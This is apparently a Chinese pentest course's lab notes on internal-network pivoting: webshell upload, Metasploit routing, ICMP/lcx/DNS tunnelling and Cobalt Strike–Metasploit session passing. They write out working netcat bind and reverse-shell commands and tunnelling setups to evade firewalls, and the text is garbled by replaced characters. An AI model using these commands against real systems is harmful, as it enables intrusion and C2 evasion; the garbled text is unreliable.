第?臺主機的192.168.75.148我們可以直接訪問,通過端?掃描,得知開啟了80端?,訪問該端?得到以下內容
利?ThinkPhP的利??具攻擊
得到?個命令執?漏洞,寫?webshell在當前?錄為2.php
使?后?管理?具進?連接
我們要將它作為?個跳板,使?msf或者CS
現在使?攻擊機kali
使?msf?成?個Linux后?
msf監聽
將??通過webshell上傳??標主機,執?
msf接受到會話
在msf和cs上有?帶的代理
信息收集,獲取?卡信息,看是否有內?
除了.76外還有?張.22的?卡,現在?法與他連接
查看路由,看是否和他建?路由規則
當前路由為空,添加路由地址,再次查看路由
現在應該可以和.22進?通信,但只能在msf會話上操作,?法攻擊。我們可以使?msf在本地開啟代理
這?應該是設置的srvport.
開始利?代理端?掃描
掃到.22.128的80端?,直接?瀏覽器?法打開,配置瀏覽器代理,直接選擇Socks v4.
可以訪問
源碼中告訴漏洞在哪
進?SQL注?得到密碼賬戶
通過robots.txt得到登錄地址,登錄后臺
可以通過后臺功能得到webshell,可以往??寫websehll
觀察?站url查找規律
??具連接后?。這?推薦蟻劍,可以設置代理
連接成功
也可以使?Proxifier全局代理?具,
還有SocksCap64進程代理?具。
加載代理,然后再將webshell管理?具在代理隧道中允許
使?msf?成正向后?綁定本機3333端?,然后再去尋找?標機
將??通過websell上傳??標主機,msf監聽
?標機執???,msf上線
得到?絡環境,添加路由
重復之前的操作
使?nmap -script=all掃描漏洞
內網安全-域橫向網絡&傳輸&應用層隧道技術
必備知識點:
1.代理和隧道技術區別?
代理主要是解決訪問問題,隧道主要解決安全攔截問題。
2.隧道技術為了解決什么?
隧道主要解決安全攔截問題。
3.隧道技術前期的必備條件?
已經獲得?定的控制權,但是不能對控制的東?進?信息收集或執?它上?的東? 在數據通信被攔截的情況下利?隧道技術封裝改變通信協議進?繞過攔截 CS、MSF?法上線,數據傳輸不穩定?回顯,出?數據被監控,?絡通信存在問題等
在實際的網絡中,通常會通過各種邊界設備、軟/硬件防火墻甚至入侵檢測系統來檢查對外連接情況,如果發現異樣,就會對通信進行阻斷。那么什么是隧道呢?這里的隧道,就是一種繞過端口屏蔽的通信方式。防火墻兩端的數據包通過防火墻所允許的數據包類型或端口進行封裝,然后穿過防火墻,與對方進行通信。當封裝的數據包到達目的地時,將數據包還原,并將還原后的數據包發送到相應服務器上。
常用的隧道技術有以下三種:
網絡層:IPv6 隧道、ICMP 隧道
傳輸層:TCP 隧道、UDP 隧道、常規端口轉發
應用層:SSH 隧道、HTTP/S 隧道、DNS 隧道
實驗環境:
案例 1-網絡傳輸應用層檢測連通性-檢測
1. TCP 協議 用“瑞士軍刀”——netcat 執行 nc 命令:nc <IP> <端口> 2. HTTP 協議 用“curl”工具,執行 curl <IP 地址:端口>命令。如果遠程主機開啟了相應的端口,且內網可連接外網的 話,就會輸出相應的端口信息 3. ICMP 協議 用“ping”命令,執行 ping <IP 地址/域名> 4. DNS 協議 檢測 DNS 連通性常用的命令是“nslookup”和“dig” nslookup 是 windows 自帶的 DNS 探測命令 dig 是 linux 系統自帶的 DNS 探測命令案例 2-網絡層 ICMP 隧道 ptunnel 使用-檢測,利用
kali2020-Target2-Target3
pingtunnel 是把 tcp/udp/sock5 流量偽裝成 icmp 流量進行轉發的工具 -p ##表示連接 icmp 隧道另一端的機器 IP(即目標服務器) -lp ##表示需要監聽的本地 tcp 端口 -da ##指定需要轉發的機器的 IP(即目標內網某一機器的內網 IP) -dp ##指定需要轉發的機器的端口(即目標內網某一機器的內網端口) -x ##設置連接的密碼 Webserver:./ptunnel -x xiaodi Hacker xiaodi:./ptunnel -p 192.168.76.150 -lp 1080 -da 192.168.33.33 -dp 3389 -x xiaodi #轉發的 3389 請求數據給本地 1080 Hacker xiaodi:rdesktop 127.0.0.1 1080老版本介紹:https://github.com/f1vefour/ptunnel(需自行編譯)
新版本介紹:https://github.com/esrrhs/pingtunnel(二次開發版)
前期要將?具上傳?Target2
在webserver上運行程序
再在kali主機上執?命令
發現有流量傳過來
連接本地1080端?,
彈出遠程連接端?
在Target3上我們發現3389端?正在被Target2請求,實際上是kali請求的
現在遠程連接它?的不是以前的那個協議,?是ICMP流量的數據
把3389流量轉成了ICMP流量
案例 3-傳輸層轉發隧道 Portmap 使用-檢測,利用(???)
端?轉發,環境是域環境
windows: lcx
linux:portmap
lcx -slave 攻擊 IP 3131 127.0.0.1 3389 //將本地 3389 給攻擊 IP 的 3131
lcx -listen 3131 3333 //監聽 3131 轉發至 3333
?kali連接WEbserver的7777
案例 4-傳輸層轉發隧道 Netcat 使用-檢測,利用,功能
Kali2020-god\webserver-god\sqlserver|dc
1.雙向連接反彈 shell
正向:攻擊連接受害
受害:nc -ldp 1234 -e /bin/sh //linux
nc -ldp 1234 -e c:\windows\system32\cmd.exe //windows
攻擊:nc 192.168.76.132 1234 //主動連接
反彈回會話
反向:受害連接攻擊
攻擊:nc -lvp 1234
受害:nc 攻擊主機 IP 1234 -e /bin/sh
nc 攻擊主機 IP 1234 -e c:\windows\system32\cmd.exe
反彈回shell
2.多向連接反彈 shell-配合轉發
反向:
god\Webserver:Lcx.exe -listen 2222 3333
god\Sqlserver:nc 192.168.3.31 2222 -e c:\windows\system32\cmd.exe
kali 或本機:nc -v 192.168.76.143 3333
直接反彈回來了shell
正向該怎么操作呢?實戰中改怎么選擇正向和反向?
3.相關 netcat 主要功能測試
指紋服務:nc -nv 192.168.76.143
端口掃描:nc -v -z 192.168.76.143 1-100
端口監聽:nc -lvp xxxx
文件傳輸:nc -lp 1111 >1.txt|nc -vn xx.xx.x.x 1111 <1.txt -q 1
反彈 Shell:見上
案例 5-應用層 DNS 隧道配合 CS 上線-檢測,利用,說明
當常見協議監聽器被攔截時,可以換其他協議上線,其中 dns 協議上線基本通殺
1.云主機 Teamserver 配置端口 53 啟用-udp
2.買一個域名修改解析記錄如下:
A 記錄->cs 主機名->CS 服務器 IP
NS 記錄->ns1 主機名->上個 A 記錄地址
NS 記錄->ns2 主機名->上個 A 記錄地址
3.配置 DNS 監聽器內容如下:
ns1.xiaodi8.com
ns2.xiaodi8.com
cs.xiaodi8.com
在cs中添加監聽器
4.生成后門執行上線后啟用命令:
beacon> checkin
[*] Tasked beacon to checkin
beacon> mode dns-txt
xiaodi-pc\xiaodi
執?完命令之后
?成后?:
上傳后?,執?,上線
dns上線后視圖中的電腦和其他協議不同,速度慢,還要執??條命令才能?
學隧道的意義?
測試的協議可能會被攔截。 有個?站是有80端? ,http服務的。有漏洞,但訪問不了,?訪問就斷斷續續或直接訪問不到。原因可能是對?防?墻禁?你的IP訪問或者檢測到有異常,這個時候,如果去搞的話,都是http協議,我們可以換個協議去搞。
域橫向 CS&MSF 聯動shell
?標機
啟動CS服務端
啟動CS客戶端
?標機執???,在CS上上線
啟動MSF
接下來,將CS移交到MSF上,?先,有創建?個監聽器,host是msf所在服務器IP
在msf上創建監聽器,payload要和cs監聽器協議?樣,端?也要?樣
想要反彈哪個會話,點擊視圖中對應的電腦,選擇Spawn
在msf處上線
從msf到cs,先記錄要返回session的id
?前三臺主機在cs上
現在成了4臺
總結
以上是生活随笔為你收集整理的内网安全“小迪安全课堂笔记”域横向的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: C++编程经验总结1
- 下一篇: awk中文手册